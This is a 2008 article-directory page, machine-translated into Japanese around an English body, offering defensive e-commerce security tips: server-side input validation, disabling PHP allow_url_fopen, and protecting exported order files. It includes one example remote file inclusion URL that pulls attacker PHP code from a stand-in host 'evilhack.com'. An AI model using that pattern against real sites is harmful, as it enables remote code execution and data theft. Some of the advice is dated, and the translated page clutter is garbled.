The following content has been automatically translated by close 
E -コマースのセキュリティ-セキュリティホールを塞ぐ| eコマースの記事
第Sphere Logoは
"eコマースの "第
記事のディレクトリホーム すべてのカテゴリ インターネットおよびe - Business eコマース

E -コマースのセキュリティ-セキュリティホールを塞ぐ

専門家著者: ポールロバーツ | 論文抄録
語数:520語|再生回数:135ビュー(秒)
Security in an e-commerce website needs to be a major consideration when developing an e-commerce website or software. A developer needs to be aware of all the security considerations when designing a site. With e-commerce becoming more commonplace these days, the number of security attacks is certainly increasing. Paranoia is a healthy thing for e-commerce site developers, we need to keep up to gate with security issues, and keep our ears and eyes open. Though the following loopholes are serious, the following loopholes if present are easily fixed.

Listed below are some security considerations to be included when developing a site. This article does not cover e-shoplifting, please see my separate article on this.

User input - every input, whether it be entering a quantity, searching for a product, entering a name etc, needs to be validated for suspicious characters. If this is not done, it is possible to enter “?>”, the closing end tags of PHP and execute some PHP code.

It is far safer allow numbers and characters a-z (capitals included) and 0-9 and nothing else, rather than make a list of all the character that shouldn’t be there. The validation script needs to scroll through each character one by one. This needs to be achieved using in server side validation, not Javascript. Using server side input validation is essential to keep out unwanted characters

There exists another major when executing PHP code. When using PHP there is a setting called allow_url_fopen which enables the opening of files from a PHP script. This setting should be turned off, unless absolutely necessary.

Just imagine you have PHP scripts for both fixed headers and footers, and to access your webpages you would type in http://www.mysite.com/index.php?page=page2. All it takes is a malicious user to run a script by modifying these parameters by typing in “http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt” with some PHP code in the file “hacker.txt”. You could have anything happen, PHP files read, deleted, vital information stolen.

If you are not sure if this setting is on or off, please copy the following PHP code into a text file, and upload it to your web server:

phpinfo();
?>

When you access your script on your webserver, you should come across the setting allow_url_fopen under configuration.

A computer user, under normal circumstances cannot find the value of this setting.

Be careful of exported data like orders, products in CSV and mySQL files. If this data is exported from a script and is kept on the web server under a common file name ie. http://www.mysite.com/admin/output_tables.csv. This is only really a problem when the exported data resides in a file in a directory that is publicly accessible. There is two ways to prevent this security loophole - First have the output file behind a password protected directory, secondly have the data located inside a HTML textarea form element on a script. The storeowner can then copy this information from the textfile and create a new file on their computer and paste the information here.

All it takes is a hacker to find this filename by checking out the e-commerce software’s demo website and look for the same filename on a real site.
ポールロバーツ

著者について/著者バイオ

ポールロバーツ
私は、ソフトウェア開発会社のメールに特化コマース、検索エンジン最適化、および印刷の推定ソフトウェアロボ設計ソリューションと呼ばれる実行。私も名前をロボのデザインの下にニュージーランドE -コマースソリューションとソフトウェアを開発する。

Article Source: http://www.ja.articlesphere.com/Article/E-Commerce-Security---Plugging-the-Security-Holes/145459

Article Tags: e-commerce, ecommerce, security, loophole, loopholes, plugging, secure, validation

Article Submitted: 2008-06-05 | This Article has been viewed 135 times.

Rate Article

Related Videos

Play Video
How to Strengthen Network Security with Cisco Network Manager
Play Video
Understanding your Home Network Router #5 - Secure Your Network with WPA2
Play Video
Learn About Secure Computingの
再生ビデオ
どのようにコンピュータを安全に保つ
再生ビデオ
Windows Vistaでセキュリティの設定をチェックする

以上の"eコマース"関連記事

以下のリストはより多くの記事は、"eコマース"の記事のカテゴリから、上記の資料に関連している。

人々は、上記の資料に"E -コマースのセキュリティ- "セキュリティホールを塞ぐ興味がありますが、関連する記事を下記のように興味を持っている:

e -コマース事業を実行するだけであなたのウェブサイトを維持し、実行しているではありません。お客様は、あなたの能力、電話、ファックス、電子メール、またはその他の手段を介して提供するに頼っていると、すべてのシステムの必要な作業を顧客の要望に応えできるようにする。
日間の背中のちょうどカップル私は、私の友人と談笑した。彼は自分の赤ちゃんの1歳の誕生日を祝っていた、ケララ州、チェンナイ、彼の職場での彼の母国の間に実行しなければならなかった。彼と彼のよい半分、これらの場所間の旅を最後の1ヶ月間に少なくとも4倍です。
場合の時間を任意の量の電子商取引を行ってきた、あなたは、卸売ドロップシップのディレクトリサービスの正規のプロバイダーよりscamersが知られているだろう。 eビジネスの世界ではビジネス、Salehooと世界のブランドは、過去数年で人気を集めていると評判のサービスプロバイダーです。
続ける場合は、オンライン小売されている場合、おそらく既にSalehooのか聞いても、あなたの利点にそれを使用します。だけの場合、お客様のビジネスとを開始している場合は、混合Salehooと混同する可能性もあるレビュー。今、私たちSalehoo本当にすべてについて、それらの多くを無視する傾向があるが提供するサービスとは何かを見ていきましょう。
どのように多くの人があなたに何かを購入している知っているのですか?あなたのように私はかなりの数、その理由をeコマースの世界で新たなオンラインショッピングモールです。だが、これらのオンライン小売店で実行される?あなたと私のように、なぜこのような事業と活況を呈して今も将来的にブームに引き続き人民。
場合は、最新の電子製品の大ファンですが、あなた自身のエレクトロニクス事業を実行しているという考えに誘惑される場合があります。それが起動するときに使用すると、右側のドロップエレクトロニクス郵送サービスをフルに活用いただきから選択することがたくさんあるれているハードではありません。
これまでにお近くのコンビニに行くでしたし、もしあなたが所有してどんなふうになるのだろうか?あなたはいいの所有者、されるかが好きな人?まあこの記事は、あなた自身のオンライン小売店、または一般に知られて所有することのメリットが表示されます e -コマースでは、本当のローカルなコンビニとは異なります。
記事のディレクトリホーム すべてのカテゴリ インターネットおよびe - Business eコマース

あなたが探しているものを見つけることができますか? Google検索してください!
(私たちは世界中で提供-場所水曜日のように更新、2009年12月9日12:58午後、シンガポール)
アメリカ合衆国、アメリカの。イギリス、英国(イングランド、スコットランド、ウェールズ、北アイルランド)。カナダ。アフガニスタン。アルバニア。アルジェリア。米領サモア。アンドラ。アンゴラ。アングィラ。南極大陸。アンティグアバーブーダ。アルゼンチン。アルメニア。アルバ。オーストラリア。オーストリア。アゼルバイジャン。バハマ。バーレーン。バングラデシュ。バルバドス。ベラルーシベルギー、。ベリーズ。ベニン。バミューダ。ブータン。ボリビア。ボネール。ボスニアヘルツェゴビナ。ボツワナ。ブラジル。英領ヴァージン諸島。ブルネイDarrusalam。ブルガリア。ブルキナファソ。ブルンジ。カンボジア。カメルーン。カーボベルデ。ケイマン諸島。中央アフリカ共和国。チャド。チャネル諸島。チリ。磁器。クリスマス島。コロンビア。コモロ。コンゴ。コンゴ(Dem.議員)。クック諸島。コスタリカ。コートジボワール。クロアチア。キューバ。キュラソー。キプロス。チェコ共和国。デンマーク。ジブチ。ドミニカ国。ドミニカ共和国。東ティモール。エクアドル。エジプト。エルサルバドル。赤道ギニア。エリトリア。エストニア。エチオピア。フォークランド諸島と依存関係。フェロー諸島。フィジー。フィンランド、フランス。フランス領ギアナ。フランス領ポリネシア。ガボン。ガンビア。ガザ。ジョージア。ドイツ。ガーナ。ジブラルタル。ギリシャのグリーンランド。グレナダ。グアドループ。グアム。グアテマラ。ギニア。ギニアビサウ。ガイアナ。ハイチ。ハワイ諸島。ホンジュラス。香港にあります。ハンガリー。アイスランド。インド。インドネシア。イラン。イラク。マン島。イスラエル。イタリア。コートジボワール。ジャマイカ。日本。ジョンストン環礁。ヨルダン。カザフスタン。ケニア。キリバス。韓国(北)、韓国(南)。クウェート。キルギスタン。ラオス。ラトビア。レバノン。リーワード諸島。レソト。リベリア。リビア。リヒテンシュタイン。リトアニア。ルクセンブルグ。マカオ。マケドニア。マダガスカル。マラウイ。マレーシア。モルディブ。マリ。マルタ。マーシャル諸島。マルティニーク島。モーリタニア。モーリシャス。メキシコ。ミクロネシア(ミクロネシア連邦)。ミッドウェー諸島。モルドバ。モナコ。モンゴル。モントセラト。モロッコ。モスキートコースト。モザンビーク。ミャンマー(ビルマ)。ナミビア。ナウル。ナヴァッサ島。ネパール。オランダ。オランダ領アンティル諸島。ニューカレドニア。ニュージーランド。ニカラグア。ニジェール。ナイジェリア。ニウエ。ノーフォーク島。北マリアナ諸島。ノルウェー。オマーン。パキスタン。パラオ。パレスチナ。パナマ。パプアニューギニア。西沙諸島。パラグアイ。ペルー。フィリピン。ピトケアン諸島。ポーランドポルトガル- 。プエルトリコ。カタール。再会。ルーマニア。ロシア。ルワンダ。琉球諸島。セントヘレナ。セントクリストファーネイビス。セントルシア。サンピエール&ミクロン。セントビンセントグレナディーン諸島。サモア。サンマリノ。サントメ&プリンシペ。サウジアラビア。セネガル。セルビア。セイシェル。シエラレオネ。シンガポール。スロバキア。スロベニア。ソロモン諸島。ソマリア。南アフリカ。スペイン。スリランカ。スーダン。スリナム。スワジランド。スウェーデン。スイス。シリア、台湾。タジキスタン。タンザニア。タイ。トーゴ。トンガ。トランスカイ。トリニダード&トバゴ。チュニジア。トルコ。トルクメニスタン。タークスカイコス諸島。ツバル。米領バージン諸島。ウガンダ。ウクライナ。アラブ首長国連邦。ボルタ。ウルグアイ。ウズベキスタン。バヌアツ。バチカン市国(聖参照してください)。ベネズエラ。ベトナム。ウェーク島。ウィンドワード諸島。イエメン。ユーゴスラビア。ザイール。ザンビア。ジンバブエ
著作権© 2005 - ラリーイム、シンガポール-記事検索エンジンディレクトリArticleSphere.com™で
すべての権利予約ワールドワイド。すべての商標およびサービスマークはそれぞれの所有者の財産です。

アフリカーンス語 アルバニア語 アラビア語 ベラルーシ語 ブルガリア語 カタロニア語 中国語(簡体字) 中国語(繁体字) クロアチア語 チェコ語 デンマーク語 ドイツ語 英語 エストニア語 フィリピノ語 フィンランド語 フランス語 ガリシア語 ギリシャ語 ヘブライ語 ヒンディー語 ハンガリー語 アイスランド語 インドネシア語 アイルランド語 イタリア語 日本語 韓国語 ラトビア語 リトアニア語 マケドニア語 マレー語 マルタ語 オランダ語 ノルウェー語 ペルシア語 ポーランド語 ポルトガル語 ルーマニア語 ロシア語 セルビア語 スロバキア語 スロベニア語 スペイン語 スワヒリ語 スウェーデン語 タイ トルコ語 ウクライナ語 ベトナム語 ウェールズ語 イディッシュ語